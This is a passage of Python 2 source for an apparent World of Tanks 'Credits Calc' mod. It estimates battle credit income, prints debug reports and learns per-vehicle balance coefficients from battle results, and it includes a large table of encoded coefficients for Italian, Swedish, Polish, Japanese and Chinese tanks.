self.p__textDEFEAT = '<font size=\"20\" color=\"%s\">~%s%s</font>' % (colorDefeat, self.p__iconCredits, textDefeat) if self.p__compactDescr not in self.p__tempResults: vehicle = p__BigWorld.player().getVehicleAttached() self.p__tempResults[self.p__compactDescr] = { 'descr' : vehicle.typeDescriptor.type.compactDescr, 'premium' : self.p__premium, 'damage' : self.p__DAMAGE_SELF_SPOT + self.p__DAMAGE_UNKNOWN_SPOT + self.p__DAMAGE_OTHER_SPOT + self.p__DAMAGE_STUN, 'assist' : self.p__ASSIST, 'spot' : self.p__SPOT, 'level' : self.p__level, 'name' : self.p__name.replace(':', '_'), 'repairCost' : int(round(vehicle.typeDescriptor.getMaxRepairCost() - vehicle.typeDescriptor.maxHealth)), 'clearRepair': False, } self.p__tempResults[self.p__compactDescr]['damage'] = self.p__DAMAGE_SELF_SPOT + self.p__DAMAGE_UNKNOWN_SPOT + self.p__DAMAGE_OTHER_SPOT + self.p__DAMAGE_STUN self.p__tempResults[self.p__compactDescr]['assist'] = self.p__ASSIST self.p__tempResults[self.p__compactDescr]['spot'] = self.p__SPOT if self.p__tempResults[self.p__compactDescr]['repairCost'] == self.p__repairCost: self.p__tempResults[self.p__compactDescr]['clearRepair'] = True else: self.p__tempResults[self.p__compactDescr]['clearRepair'] = False p__flash.p__visible(True) p__flash.setCreditsText(self.p__textWin if not self.p__altMode else self.p__textDEFEAT) def p__keyPressed(self, event): player = p__BigWorld.player() if not player.arena: return if player.arena.bonusType != p__ARENA_BONUS_TYPE.REGULAR: return isKeyDownTrigger = event.isKeyDown() if event.key in [p__Keys.KEY_LALT, p__Keys.KEY_RALT]: if isKeyDownTrigger: self.p__altMode = True if event.isKeyUp(): self.p__altMode = False self.p__calc() if event.key in [p__Keys.KEY_LCONTROL, p__Keys.KEY_RCONTROL]: if isKeyDownTrigger: self.p__ctrlMode = True if event.isKeyUp(): self.p__ctrlMode = False self.p__calc() def p__correctedText(self, min, max, outcome): out = '<font color=\"#FF0000\"> -%s</font>' % outcome if outcome else '' if min != max: if self.p__ctrlMode: return '%s[%s]%s' % (min, int(max * 1.05), out) # add 5% to max credits range return '%s%s' % (min, out) return '%s%s' % (max, out) def p__getDebugText(self): debugText = 'Coeff: %s: %s\n' % ('MISS' if self.p__compactDescr not in self.p__COEFFICIENTS 
else 'FOUND', self.p__balanceCoeff) if self.p__compactDescr not in self.p__COEFFICIENTS: debugText += '\nCredit Calc need learn\non that vehicle\n' if not self.p__tempResults[self.p__compactDescr]['damage']: debugText += 'JUST SUICIDE FAST plz!\n' debugText += 'And wait until battle down\n' else: debugText += 'wrong battle! play again\n' return debugText def p__stopBattle(self): player = p__BigWorld.player() self.p__ctrlMode = False self.p__altMode = False player.arena.onVehicleKilled -= self.p__onVehicleKilled # if player.guiSessionProvider.shared.vehicleState is not None: # player.guiSessionProvider.shared.vehicleState.onVehicleStateUpdated -= self.p__deviceTouched ammoCtrl = player.guiSessionProvider.shared.ammo if ammoCtrl is not None: ammoCtrl.onShellsAdded -= self.p__onShellsAdded ammoCtrl.onShellsUpdated -= self.p__onShellsUpdated p__InputHandler.g_instance.onKeyDown -= self.p__keyPressed p__InputHandler.g_instance.onKeyUp -= self.p__keyPressed p__flash.p__stopBattle() if p__DEBUG: if self.p__compactDescr not in self.p__tempResults: return self.p__compactDescr, self.p__balanceCoeff = self.p__deCode(self.p__tempResults[self.p__compactDescr]['descr']) print 'tempResults', self.p__tempResults[self.p__compactDescr] outcomeCredits = self.p__battleOutcome() textWinner = '~%s' % self.p__correctedText(self.p__WinResultMin, self.p__WinResult, outcomeCredits) textDefeat = '~%s' % self.p__correctedText(self.p__DefeatResultMin, self.p__DefeatResult, outcomeCredits) textWinnerPremium = '' textDefeatPremium = '' if p__BattleReplay.g_replayCtrl.isPlaying: textWinnerPremium = ', With Premium account: ~%s Credits' % self.p__correctedText(int(1.5 * self.p__WinResultMin), int(1.5 * self.p__WinResult), outcomeCredits) textDefeatPremium = ', With Premium account: ~%s Credits' % self.p__correctedText(int(1.5 * self.p__DefeatResultMin), int(1.5 * self.p__DefeatResult), outcomeCredits) price = self.p__hangarOutcome for equipment in self.p__usedItems: if self.p__usedItems[equipment][0]: price += self.p__usedItems[equipment][1] for ammo in self.p__hangarAmmo: if self.p__hangarAmmo[ammo][1]: price += self.p__hangarAmmo[ammo][0] * self.p__hangarAmmo[ammo][1] consumables = int(round(price)) print '#' * 40 print 'Credits Calculate mode' print 'VEHICLE: %s level:%s (id:%s)' % (self.p__tempResults[self.p__compactDescr]['name'], self.p__tempResults[self.p__compactDescr]['level'], self.p__compactDescr) print 'damage:%s, assist:%s, spot:%s, %s' % (self.p__tempResults[self.p__compactDescr]['damage'], self.p__tempResults[self.p__compactDescr]['assist'], self.p__tempResults[self.p__compactDescr]['spot'], 'clear repaired' if self.p__tempResults[self.p__compactDescr]['clearRepair'] else 'not cleared repair') print 'damage detail: selfSpot:%s, unkwnSpot:%s, othrSpot:%s, forStunned:%s, ' % (self.p__DAMAGE_SELF_SPOT, self.p__DAMAGE_UNKNOWN_SPOT, self.p__DAMAGE_OTHER_SPOT, self.p__DAMAGE_STUN) print 'coeff:%s, premCoeff:%s' % (self.p__balanceCoeff, self.p__tempResults[self.p__compactDescr]['premium']) print 'repairCost:%s[%s], consumables:%s' % (-int(round(self.p__repairCost * self.p__balanceCoeff)), -self.p__repairCost, -consumables) amm0 = '' for ammo in self.p__hangarAmmo: amm0 += '%s Credits (%s * %s) ' % (self.p__hangarAmmo[ammo][0] * self.p__hangarAmmo[ammo][1], self.p__hangarAmmo[ammo][0], self.p__hangarAmmo[ammo][1]) if amm0: print 'Ammo: %s' % amm0 print 'WINNER:%s Credits' % textWinner + textWinnerPremium print 'DEFEAT:%s Credits' % textDefeat + textDefeatPremium print '#' * 40 print self.p__getDebugText() 
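# --- Illustrative sketch, not part of the original mod ----------------------
# p__calc above estimates the credit income from fixed per-event rates:
# 5 credits per point of assist damage, 100 per spot, 7.7 per point of damage
# to stunned targets, 10 per point of self-spotted damage and 7.5 per point
# of damage on targets spotted by others, on top of a level * 1300 (win) or
# level * 700 (defeat) base, all scaled by the vehicle balance coefficient
# and the premium factor.  Damage whose spotter is unknown is swung between
# the two rates to produce a min/max range.  A condensed restatement of that
# arithmetic (function name is hypothetical):
def _estimate_credits(win, level, balance_coeff, premium_coeff,
                      assist, spot, dmg_self, dmg_other, dmg_unknown, dmg_stun):
    base = level * (1300 if win else 700)
    fixed = base + assist * 5 + spot * 100 + dmg_stun * 7.7
    dmg_max = (dmg_self + dmg_unknown) * 10 + dmg_other * 7.5
    dmg_min = dmg_self * 10 + (dmg_unknown + dmg_other) * 7.5
    # Rounding mirrors the original: inner sum truncated, -0.5 before the
    # premium multiplication, +0.5 before the final truncation.
    calc = lambda dmg: int(int(balance_coeff * int(fixed + dmg) - 0.5)
                           * premium_coeff + 0.5)
    return calc(dmg_min), calc(dmg_max)
# ---------------------------------------------------------------------------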
self.p__hangarOutcome = 0 self.p__hangarItems = {} self.p__hangarAmmo = {} self.p__killed = False self.p__repairCost = 0 self.p__costRepairs = {} self.p__usedItems = {} def p__hangarMessage(self): if not p__config.p__data['enabled']: return # if not (p__DEBUG or p__DEBUG_COEFF): # return if p__ServicesLocator.hangarSpace is not None and p__ServicesLocator.hangarSpace.inited: self.p__recalculatedMessage = '<font size=\"20\" color=\"#FFE041\">%s</font>\n' % self.p__hangarHeader if self.p__textWin or self.p__textDEFEAT: textWinner = self.p__correctedText(self.p__WinResultMin, self.p__WinResult, 0) textDefeat = self.p__correctedText(self.p__DefeatResult, self.p__DefeatResult, 0) colorWin = '#80D639' colorDefeat = '#FF6347' self.p__textWin = '<font size=\"20\" color=\"%s\">~%s%s</font>' % (colorWin, self.p__iconCredits, textWinner) self.p__textDEFEAT = '<font size=\"20\" color=\"%s\">~%s%s</font>' % (colorDefeat, self.p__iconCredits, textDefeat) self.p__recalculatedMessage += ' ' + self.p__textWin + '<font size=\"20\" color=\"#FFE041\"> %s </font>' % self.p__vehicleName + self.p__textDEFEAT self.timerMessage() # p__SystemMessages.pushMessage(p__msg, p__SystemMessages.SM_TYPE.GameGreeting) def timerMessage(self): if not p__config.p__data['hangar_show']: return if p__g_currentVehicle.item: p__flashInHangar.setPosition(p__config.p__data['hangar_x'], p__config.p__data['hangar_y']) # x and y p__flashInHangar.setBackground(p__config.p__data['battle_background'], '0x000000', 0.4) # change to false if dont want p__flashInHangar.setText(self.p__recalculatedMessage) # p__SystemMessages.pushMessage(self.p__recalculatedMessage, p__SystemMessages.SM_TYPE.GameGreeting) return p__BigWorld.callback(1.0, self.timerMessage) def p__tester(self, credits, premiumCoeff, winCoeff, level, assist, spot): result = [] winCoeff = 1300 if winCoeff else 700 pool = { 1: (99, 0.1), 2: (999, 0.01), 3: (9999, 0.001), 4: (99999, 0.0001), 5: (999999, 0.00001), } for ranged in pool: boosterCoeff = 0.0 for i in xrange(pool[ranged][0]): boosterCoeff = round(boosterCoeff + pool[ranged][1], ranged) if credits == int(int(boosterCoeff * int(level * winCoeff + assist * 5 + spot * 100) - 0.5) * premiumCoeff + 0.5): result.append(boosterCoeff) if result: if p__DEBUG: print 'search pool: %s' % ranged, pool[ranged], boosterCoeff return result return result def p__sortValues(self, value, debug=False): try: index = self.p__coeffDefaults.index(filter(lambda x: value <= x + 0.0005, self.p__coeffDefaults)[0]) if p__DEBUG or debug: print 'sortValues value: %s=>[%s]<%s' % (self.p__coeffDefaults[index], value, self.p__coeffDefaults[index + 1] if len(self.p__coeffDefaults) > index + 1 else self.p__coeffDefaults[index]) return self.p__coeffDefaults[index] except Exception as e: if p__DEBUG or debug: print 'sortValues error not in range:%s' % value return value def p__sortResult(self, data1, data2, testCoeff): if data1 and data2: check1 = self.p__sortValues(round(sum(data1) / len(data1), 5), p__DEBUG_COEFF) check2 = self.p__sortValues(round(sum(data2) / len(data2), 5), p__DEBUG_COEFF) if check1 == testCoeff or check2 == testCoeff: return testCoeff if check1 == check2: return check1 if check1 in data2: return check1 if check2 in data1: return check2 return 0.0 def p__resultReCalc(self, typeCompDescr, isWin, credits, originalCredits, spot, assist, damage, repair): if p__DEBUG or p__DEBUG_COEFF: print '$$$$$ resultReCalc started' self.p__readJson() vehicleCompDesc, testCoeff = self.p__deCode(typeCompDescr) if vehicleCompDesc in self.p__tempResults: # if 
self.p__tempResults[vehicleCompDesc]['clearRepair'] and False: # if p__DEBUG or p__DEBUG_COEFF: # print '$$$$$$$$$$$$$$ CLEAR REPAIR MODE $$$$$$$$$$$$$$' # calcRepair = int(round(self.p__tempResults[vehicleCompDesc]['repairCost'] * testCoeff)) # if p__DEBUG or p__DEBUG_COEFF: # level = self.p__tempResults[vehicleCompDesc]['level'] # winCoeff = 1300 if isWin else 700 # print 'VEHICLE: %s level:%s (id:%s)' % (self.p__tempResults[vehicleCompDesc]['name'], self.p__tempResults[vehicleCompDesc]['level'], vehicleCompDesc) # print 'level:%s, assist:%s, spot:%s, winCoeff:%s, balanceCoeff:%s' % (level, assist, spot, winCoeff, testCoeff) # print 'repair:%s calcRepair:%s' % (repair, calcRepair) # if repair != calcRepair: # check = round(repair / round(self.p__tempResults[vehicleCompDesc]['repairCost']), 4) # if p__DEBUG or p__DEBUG_COEFF: # print 'repair / calcRepair = %s' % (repair / round(self.p__tempResults[vehicleCompDesc]['repairCost'])) # print 'possible coeffs:', check # print '####2 resultReCalc SAVED coeff[%s]' % check # self.p__compactDescr, self.p__balanceCoeff = self.p__code(typeCompDescr, check) # self.p__readJson() # if p__DEBUG or p__DEBUG_COEFF: # print "####1 '%s': %s," % (self.p__compactDescr,self.p__balanceCoeff) # if p__DEBUG or p__DEBUG_COEFF: # self.p__recalculatedMessage = '<font size=\"20\" color=\"#FFE041\">Credits Calc to %s (id:%s)\nNew coeff:%s assigned, %s to %s</font>\n' % (self.p__tempResults[vehicleCompDesc]['name'], self.p__compactDescr, check, testCoeff, check) # p__BigWorld.callback(1.0, self.timerMessage) # return if not damage: if p__DEBUG or p__DEBUG_COEFF: print '$$$$$$$$$$$$$$ NO DAMAGE MODE $$$$$$$$$$$$$$' checkCorrectedBattleData = credits / float(originalCredits) if p__DEBUG: if checkCorrectedBattleData != 1.5: print '$$$$ BATTLE DATA INCORRECT! 
PLAY AGAIN $$$$' # premiumCoeff = self.p__premium # if p__BattleReplay.g_replayCtrl.isPlaying: premiumCoeff = 1.0 if checkCorrectedBattleData < 1.01 else 1.5 winCoeff = 1300 if isWin else 700 level = self.p__tempResults[vehicleCompDesc]['level'] result1 = self.p__tester(originalCredits, 1.0, isWin, level, assist, spot) result2 = self.p__tester(credits, 1.5, isWin, level, assist, spot) checkData = int(int(1.0 * int(level * winCoeff + assist * 5 + spot * 100) - 0.5) * premiumCoeff + 0.5) if premiumCoeff > 1.1: coeff1 = round(checkData / originalCredits, 4) else: coeff1 = round(originalCredits / checkData, 4) check = self.p__sortResult(result1, result2, coeff1) if p__DEBUG: print 'VEHICLE: %s level:%s (id:%s)' % (self.p__tempResults[vehicleCompDesc]['name'], self.p__tempResults[vehicleCompDesc]['level'], vehicleCompDesc) print 'level:%s, assist:%s, spot:%s, winCoeff:%s, balanceCoeff:%s' % (level, assist, spot, winCoeff, testCoeff) print 'credits:%s originalCredits:%s, checkData:%s' % (credits, originalCredits, checkData) print 'credits / originalCredits = %s' % checkCorrectedBattleData print 'possible coeffs:', check checkOne = check # if check and testCoeff == check: # return # if coeff1 == testCoeff: # return if p__DEBUG: print '#### resultReCalc coeff1[%s] and testCoeff[%s]' % (coeff1, testCoeff) print 'result1 = ', result1 if result1: print 'result1 coeff = %s' % round(sum(result1) / len(result1), 4) print 'result2 = ', result2 if result2: print 'result2 coeff = %s' % round(sum(result2) / len(result2), 4) if p__DEBUG_COEFF: print '$$$$ 1 round coeff:%s' % round(sum(result1) / len(result1), 4), result1 print '$$$$ 2 round coeff:%s' % round(sum(result2) / len(result2), 4), result2 print '$$$$ VEHICLE: %s level:%s (id:%s)' % (self.p__tempResults[vehicleCompDesc]['name'], self.p__tempResults[vehicleCompDesc]['level'], vehicleCompDesc) print '$$$$ originalCoeff: %s, possibleCoeff1: %s, possibleCoeff2: %s' % (testCoeff, checkOne, check) self.p__readJson() checkData *= premiumCoeff coeff2 = round(credits / checkData, 4) checkAgain = self.p__sortResult(result1, result2, coeff2) if checkAgain and check != checkAgain: check = checkAgain if p__DEBUG: print '#### resultReCalc coeff2[%s] and coeff1[%s] and check[%s]' % (coeff2, coeff1, check) if coeff1 == coeff2 and coeff1 != 1.0: if p__DEBUG or p__DEBUG_COEFF: print '####1 resultReCalc SAVED coeff[%s] ' % (coeff2) self.p__compactDescr, self.p__balanceCoeff = self.p__code(typeCompDescr, coeff2) self.p__readJson() if p__DEBUG or p__DEBUG_COEFF: print "####1 '%s': %s," % (self.p__compactDescr, self.p__balanceCoeff) else: if check: if p__DEBUG or p__DEBUG_COEFF: print '####2 resultReCalc SAVED coeff[%s]' % check self.p__compactDescr, self.p__balanceCoeff = self.p__code(typeCompDescr, check) self.p__readJson() if p__DEBUG or p__DEBUG_COEFF: print "####2 '%s': %s," % (self.p__compactDescr, self.p__balanceCoeff) if p__DEBUG or p__DEBUG_COEFF: self.p__recalculatedMessage = '<font size=\"20\" color=\"#FFE041\">Credits Calc to %s (id:%s)\nNew coeff:%s assigned, %s to %s</font>\n' % (self.p__tempResults[vehicleCompDesc]['name'], self.p__compactDescr, check, testCoeff, check) p__BigWorld.callback(1.0, self.timerMessage) # del self.p__tempResults[vehicleCompDesc] def p__receiveBattleResult(self, isSuccess, battleResults): # print battleResults playerVehicles = battleResults['personal'].itervalues().next() if not playerVehicles: return assist = max(playerVehicles['damageAssistedRadio'], playerVehicles['damageAssistedTrack'], playerVehicles['damageAssistedStun']) 
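# --- Illustrative sketch, not part of the original mod ----------------------
# p__receiveBattleResult above feeds the post-battle 'personal' block into
# p__resultReCalc, which (for a battle without damage) recovers an unknown
# balance coefficient: p__tester sweeps candidate coefficients at increasing
# precision (steps of 0.1 down to 0.00001) and keeps every value whose
# reconstructed credits equal the server-reported amount.  A condensed
# Python 2 restatement of that search (function name is hypothetical):
def _search_coeff(credits, premium_coeff, win, level, assist, spot):
    base = level * (1300 if win else 700) + assist * 5 + spot * 100
    matches = []
    for digits in (1, 2, 3, 4, 5):
        step = 10.0 ** -digits
        coeff = 0.0
        for _ in xrange(10 ** (digits + 1) - 1):
            coeff = round(coeff + step, digits)
            if credits == int(int(coeff * int(base) - 0.5) * premium_coeff + 0.5):
                matches.append(coeff)
        if matches:
            break  # a match at coarse precision makes the finer passes moot
    return matches
# ---------------------------------------------------------------------------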
spot = playerVehicles['spotted'] damage = playerVehicles['damageDealt'] repair = playerVehicles['repair'] # 'subtotalCredits', 'factualCredits' # 'credits' - 'eventCredits' self.p__resultReCalc(playerVehicles['typeCompDescr'], battleResults['common']['winnerTeam'] == playerVehicles['team'], playerVehicles['factualCredits'], playerVehicles['originalCredits'], spot, assist, damage, repair) def p__coeffTable(self): self.p__COEFFICIENTS = {'4146125958': 8992455000, '10853840166': 8093209500, '11303985030': 7793461000, '11131707366': 8392958000, '11487377382': 9442077750, '1834270854': 5605296950, '511622982': 5994970000, '2990198406': 5917035390, '17850536262': 8992455000, '5568806022': 5994970000, '4857465990': 6474567600, '21557284710': 10491197500, '3790455942': 6294718500, '11215067526': 7793461000, '3434785926': 8392958000, '4323960966': 4496227500, '5035300998': 9352153200, '11031675174': 7793461000, '12715550406': 8992455000, '11159494086': 8992455000, '11587409574': 7313863400, '11915292870': 8872555600, '867292998': 4316378400, '3168033414': 5994970000, '11765244582': 7553662200, '10970544390': 7793461000, '4679630982': 4376328100, '12476584614': 7793461000, '10770480006': 8692706500, '5213136006': 5976985090, '12031997094': 8992455000, '12804467910': 7793461000, '11203952838': 8992455000, '5835558534': 8992455000, '11309542374': 8992455000, '5657723526': 7793461000, '11926407558': 9442077750, '10981659078': 7793461000, '21468367206': 8392958000, '5746641030': 8392958000, '4946383494': 4376328100, '22685425542': 8392958000, '12721107750': 8992455000, '10803824070': 9591952000, '9269997126': 8992455000, '12359880390': 7313863400, '13071220422': 7793461000, '12104242566': 8992455000, '12898942758': 8992455000, '11409574566': 7793461000, '11398459878': 9442077750, '11209510182': 9831750800, '11559622854': 8992455000, '12209832102': 8932505300, '422705478': 5994970000, '12093127878': 8992455000, '10764922662': 7193964000, '12298749606': 9591952000, '22413115686': 8992455000, '4412878470': 4676076600, '10859397510': 9711851400, '10787152038': 7493712500, '12365437734': 9292203500, '12893385414': 7793461000, '12270962886': 8992455000, '11676327078': 9442077750, '1034013318': 6294718500, '11042789862': 5994970000, '18773055366': 8093209500, '11248411590': 8992455000, '11059461894': 8992455000, '11053904550': 7493712500, '11654097702': 9352153200, '1745353350': 5581317070, '10892741574': 7193964000, '3079115910': 6150839220, '9092162118': 8392958000, '9625667142': 8992455000, '333787974': 6594467000, '11470705350': 7793461000, '12448797894': 8992455000, '11920850214': 9591952000, '11826375366': 8992455000, '3879373446': 6594467000, '13187924646': 5587312040, '11148379398': 8992455000, '11943079590': 8902530450, '21379449702': 7793461000, '11115035334': 8992455000, '9536749638': 8992455000, '4057208454': 7793461000, '4590713478': 5233608810, '12187602726': 8992455000, '12543272742': 8992455000, '12276520230': 8752656200, '13076777766': 8093209500, '12009767718': 8392958000, '11292870342': 8992455000, '11498492070': 8692706500, '5124218502': 4676076600, '12182045382': 8992455000, '689457990': 4795976000, '11837490054': 8692706500, '1300765830': 4244438760, '12120914598': 8932505300, '12454355238': 7193964000, '3968290950': 7193964000, '11381787846': 8832988798, '11320657062': 9292203500, '22863260550': 8992455000, '9803502150': 8992455000, '5302053510': 5143684260, '4501795974': 5185649050, '22596508038': 9442077750, '11476262694': 7793461000, '12987860262': 8992455000, '11326214406': 
7793461000, '11659655046': 7793461000, '9003244614': 8662731650, '600540486': 5395473000, '22507590534': 9532002300, '13337972934': 7493712500, '12565502118': 9591952000, '12015325062': 7553662200, '11748572550': 7193964000, '11481820038': 7793461000, '956210502': 4376328100, '11415131910': 9352153200, '11126150022': 7793461000, '11737457862': 9112354400, '9447832134': 9591952000, '12537715398': 8093209500, '2278858374': 6294718500, '778375494': 4196479000, '10948315014': 9412102900, '12626632902': 8992455000, '22296411462': 8992455000, '11026117830': 9591952000, '4235043462': 4658091690, '11648540358': 9591952000, '13160137926': 8992455000, '9358914630': 8392958000, '5390971014': 5545347250, '9714584646': 8992455000, '22418673030': 8992455000, '3612620934': 3956680200, '12810025254': 7793461000, '155952966': 6594467000, '4768548486': 8992455000, '10953872358': 9442077750, '244870470': 6894215500, '11565180198': 9891700500, '12282077574': 5803130960, '12387667110': 9891700500, '11392902534': 7793461000, '9181079622': 8992455000, '67035462': 8392958000, '11298427686': 9891700500, '12921172134': 5994970000, '11120592678': 9352153200, '11854162086': 9292203500, '11231739558': 7793461000, '11570737542': 5395473000} self.p__COEFFICIENTS.update({ # italy # lightTank '55920774' : 8392958000, # 161 italy_It04_Fiat_3000 lvl:1 coeff:1.4 '144838278' : 6594467000, # 417 italy_It05_Carro_L6_40 lvl:2 coeff:1.1 # mediumTank '233755782' : 6894215500, # 673 italy_It06_M14_41 lvl:2 coeff:1.15 '322673286' : 6594467000, # 929 italy_It03_M15_42 lvl:3 coeff:1.1 '411590790' : 5994970000, # 1185 italy_It07_P26_40 lvl:4 coeff:1.0 '500508294' : 5994970000, # 1441 italy_It11_P43 lvl:5 coeff:1.0 '589425798' : 5395473000, # 1697 italy_It10_P43_bis lvl:6 coeff:0.9 '678343302' : 4795976000, # 1953 italy_It09_P43_ter lvl:7 coeff:0.8 '767260806' : 4196479000, # 2209 italy_It14_P44_Pantera lvl:8 coeff:0.7 '17839421574': 8992455000, # 51361 italy_It13_Progetto_M35_mod_46 lvl:8 coeff:1.5 !!!!PREMIUM '856178310' : 4316378400, # 2465 italy_It12_Prototipo_Standard_B lvl:9 coeff:0.72 '945095814' : 4376328100, # 2721 italy_It08_Progetto_M40_mod_65 lvl:10 coeff:0.73 }) self.p__COEFFICIENTS.update({ # sweden # lightTank '44806086' : 8392958000, # 129 sweden_S05_Strv_M21_29 lvl:1 coeff:1.4 '18006141894': 7193964000, # 51841 sweden_S15_L_60 lvl:2 coeff:1.2 !!!!PREMIUM '133723590' : 6606456940, # 385 sweden_S03_Strv_M38 lvl:2 coeff:1.102 '222641094' : 6294718500, # 641 sweden_S12_Strv_M40 lvl:3 coeff:1.05 # mediumTank '311558598' : 6294718500, # 897 sweden_S04_Lago_I lvl:4 coeff:1.05 '400476102' : 6594467000, # 1153 sweden_S02_Strv_M42 lvl:5 coeff:1.1 '489393606' : 5395473000, # 1409 sweden_S07_Strv_74 lvl:6 coeff:0.9 '17917224390': 7193964000, # 51585 sweden_S01_Strv_74_A2 lvl:6 coeff:1.2 !!!!PREMIUM '578311110' : 4795976000, # 1665 sweden_S13_Leo lvl:7 coeff:0.8 '1734238662' : 4196479000, # 4993 sweden_S29_UDES_14_5 lvl:8 coeff:0.7 '18272894406': 9591952000, # 52609 sweden_S23_Strv_81_sabaton lvl:8 coeff:1.6 !!!!PREMIUM '18183976902': 9591952000, # 52353 sweden_S23_Strv_81 lvl:8 coeff:1.6 !!!!PREMIUM '18450729414': 8992455000, # 53121 sweden_S26_Lansen_C lvl:8 coeff:1.5 !!!!PREMIUM '1823156166' : 4316378400, # 5249 sweden_S27_UDES_16 lvl:9 coeff:0.72 '18717481926': 4376328100, # 53889 sweden_S28_UDES_15_16_bob lvl:10 coeff:0.73 '1912073670' : 4376328100, # 5505 sweden_S28_UDES_15_16 lvl:10 coeff:0.73 # heavyTank '667228614' : 4795976000, # 1921 sweden_S18_EMIL_1951_E1 lvl:8 coeff:0.8 '18361811910': 8992455000, # 52865 
sweden_S25_EMIL_51 lvl:8 coeff:1.5 !!!!PREMIUM '756146118' : 4376328100, # 2177 sweden_S17_EMIL_1952_E2 lvl:9 coeff:0.73 '845063622' : 4256428700, # 2433 sweden_S16_Kranvagn lvl:10 coeff:0.71 # AT-SPG '933981126' : 6294718500, # 2689 sweden_S09_L_120_TD lvl:2 coeff:1.05 '1022898630' : 5695221500, # 2945 sweden_S20_Ikv_72 lvl:3 coeff:0.95 '1111816134' : 5575322100, # 3201 sweden_S19_Sav_M43 lvl:4 coeff:0.93 '1200733638' : 5875070600, # 3457 sweden_S14_Ikv_103 lvl:5 coeff:0.98 '1289651142' : 5401467970, # 3713 sweden_S08_Ikv_65_Alt_2 lvl:6 coeff:0.901 '1378568646' : 4795976000, # 3969 sweden_S06_Ikv_90_Typ_B_Bofors lvl:7 coeff:0.8 '18095059398': 9591952000, # 52097 sweden_S22_Strv_S1 lvl:8 coeff:1.6 !!!!PREMIUM '1467486150' : 4316378400, # 4225 sweden_S21_UDES_03 lvl:8 coeff:0.72 '1556403654' : 4196479000, # 4481 sweden_S10_Strv_103_0_Series lvl:9 coeff:0.7 '1645321158' : 3776831100, # 4737 sweden_S11_Strv_103B lvl:10 coeff:0.63 }) self.p__COEFFICIENTS.update({ # poland # lightTank '406033446' : 8506862430, # 1169 poland_Pl14_4TP lvl:1 coeff:1.419 '494950950' : 6594467000, # 1425 poland_Pl09_7TP lvl:2 coeff:1.1 '139280934' : 7793461000, # 401 poland_Pl01_TKS_20mm lvl:2 coeff:1.3 !!!!PREMIUM '583868454' : 6594467000, # 1681 poland_Pl06_10TP lvl:3 coeff:1.1 '672785958' : 6102879460, # 1937 poland_Pl07_14TP lvl:4 coeff:1.018 # mediumTank '761703462' : 6021347868, # 2193 poland_Pl12_25TP_KSUST_II lvl:5 coeff:1.0044 '50363430' : 7493712500, # 145 poland_Pl03_PzV_Poland lvl:6 coeff:1.25 !!!!PREMIUM '850620966' : 5395473000, # 2449 poland_Pl10_40TP_Habicha lvl:6 coeff:0.9 '17833864230': 7493712500, # 51345 poland_Pl16_T34_85_Rudy lvl:6 coeff:1.25 !!!!PREMIUM # heavyTank '939538470' : 5143684260, # 2705 poland_Pl11_45TP_Habicha lvl:7 coeff:0.858 '1028455974' : 4742021270, # 2961 poland_Pl13_53TP_Markowskiego lvl:8 coeff:0.791 '317115942' : 8992455000, # 913 poland_Pl08_50TP_prototyp lvl:8 coeff:1.5 !!!!PREMIUM '1117373478' : 4376328100, # 3217 poland_Pl05_50TP_Tyszkiewicza lvl:9 coeff:0.73 '1206290982' : 4256428700, # 3473 poland_Pl15_60TP_Lewandowskiego lvl:10 coeff:0.71 }) self.p__COEFFICIENTS.update({ # japan # lightTank '211526406' : 7793461000, # 609 japan_J01_NC27 lvl:1 coeff:1.3 '1100701446' : 7791063012, # 3169 japan_J02_Te_Ke lvl:2 coeff:1.2996 !!!!PREMIUM '300443910' : 6594467000, # 865 japan_J03_Ha_Go lvl:2 coeff:1.1 '833948934' : 6594467000, # 2401 japan_J04_Ke_Ni lvl:3 coeff:1.1 '1011783942' : 7193964000, # 2913 japan_J06_Ke_Ho lvl:4 coeff:1.2 # mediumTank '122608902' : 7193964000, # 353 japan_J15_Chi_Ni lvl:2 coeff:1.2 '2078793990' : 6594467000, # 5985 japan_J26_Type_89 lvl:2 coeff:1.1 '745031430' : 6594467000, # 2145 japan_J07_Chi_Ha lvl:3 coeff:1.1 '567196422' : 6594467000, # 1633 japan_J09_Chi_He lvl:4 coeff:1.1 '478278918' : 5994970000, # 1377 japan_J08_Chi_Nu lvl:5 coeff:1.0 '17906109702': 8992455000, # 51553 japan_J12_Chi_Nu_Kai lvl:5 coeff:1.5 !!!!PREMIUM '656113926' : 5095724500, # 1889 japan_J10_Chi_To lvl:6 coeff:0.85 '389361414' : 4616126900, # 1121 japan_J11_Chi_Ri lvl:7 coeff:0.77 '18083944710': 8992455000, # 52065 japan_J18_STA_2_3 lvl:8 coeff:1.5 !!!!PREMIUM '18350697222': 8992455000, # 52833 japan_J30_Edelweiss lvl:8 coeff:1.5 !!!!PREMIUM '922866438' : 4136529300, # 2657 japan_J13_STA_1 lvl:8 coeff:0.69 '1189618950' : 4496227500, # 3425 japan_J14_Type_61 lvl:9 coeff:0.75 '1278536454' : 4376328100, # 3681 japan_J16_ST_B1 lvl:10 coeff:0.73 # heavyTank '1634206470' : 6294718500, # 4705 japan_J21_Type_91 lvl:3 coeff:1.05 '1545288966' : 6294718500, # 4449 japan_J22_Type_95 
lvl:4 coeff:1.05 '1989876486' : 6294718500, # 5729 japan_J23_Mi_To lvl:5 coeff:1.05 '18172862214': 7193964000, # 52321 japan_J19_Tiger_I_Jpn lvl:6 coeff:1.2 !!!!PREMIUM '1900958982' : 5395473000, # 5473 japan_J24_Mi_To_130_tons lvl:6 coeff:0.9 '1812041478' : 4975825100, # 5217 japan_J28_O_I_100 lvl:7 coeff:0.83 '1723123974' : 4795976000, # 4961 japan_J27_O_I_120 lvl:8 coeff:0.8 '18261779718': 8992455000, # 52577 japan_J29_Nameless lvl:8 coeff:1.5 !!!!PREMIUM '1456371462' : 4256428700, # 4193 japan_J25_Type_4 lvl:9 coeff:0.71 '1367453958' : 4376328100, # 3937 japan_J20_Type_2605 lvl:10 coeff:0.73 # lightTank # '17995027206': None, #51809 japan_J05_Ke_Ni_B lvl:3 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=51809 #ype 98 Ke-Ni Otsu, Этого танка нет ни у кого }) self.p__COEFFICIENTS.update({ # china # lightTank '461606886' : 8506862430, # 1329 china_Ch06_Renault_NC31 lvl:1 coeff:1.419 '817276902' : 6762326160, # 2353 china_Ch07_Vickers_MkE_Type_BT26 lvl:2 coeff:1.128 '1528616934' : 6039332778, # 4401 china_Ch08_Type97_Chi_Ha lvl:3 coeff:1.0074 '1084029414' : 6196400992, # 3121 china_Ch09_M5 lvl:4 coeff:1.0336 '1706451942' : 5545347250, # 